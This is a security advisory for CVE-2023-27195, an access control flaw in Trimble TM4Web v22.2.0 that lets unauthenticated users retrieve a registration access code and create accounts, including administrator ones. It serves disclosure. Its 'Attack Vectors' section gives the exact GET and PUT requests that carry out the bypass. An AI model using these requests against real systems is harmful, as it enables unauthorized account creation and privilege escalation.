Share
## https://sploitus.com/exploit?id=PACKETSTORM:178023
CVE ID: CVE-2023-27195  
  
Description:  
An access control issue in Trimble TM4Web v22.2.0 allows  
unauthenticated attackers to access a specific crafted URL path to  
retrieve the last registration access code and use this access code to  
register a valid account. If the access code was used to create an  
Administrator account, attackers are also able to register new  
Administrator accounts with full rights and privileges.  
  
Vulnerability Type: Broken Access Control  
  
Vendor of Product: Trimble - Transportation  
(https://transportation.trimble.com/products/TM4Web)  
  
Affected Product Code Base: TM4Web v22.2.0  
  
Affected Component: User registration process  
  
Attack Type: Remote  
  
Impact: Privilege escalation / authentication bypass  
  
Attack Vectors:*1. Accessing the last access code *  
  
GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=  
  
Host: example.host.com  
  
  
*2. Sending PUT request to create a new user account with previously  
retrieved access code*  
  
PUT /inc/tm_ajax.msw  
  
Host: example.host.com [...]  
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser  
  
Discoverer: Clément Cruchet (lutzenfried)  
  
References:  
- Official website: https://transportation.trimble.com/products/TM4Web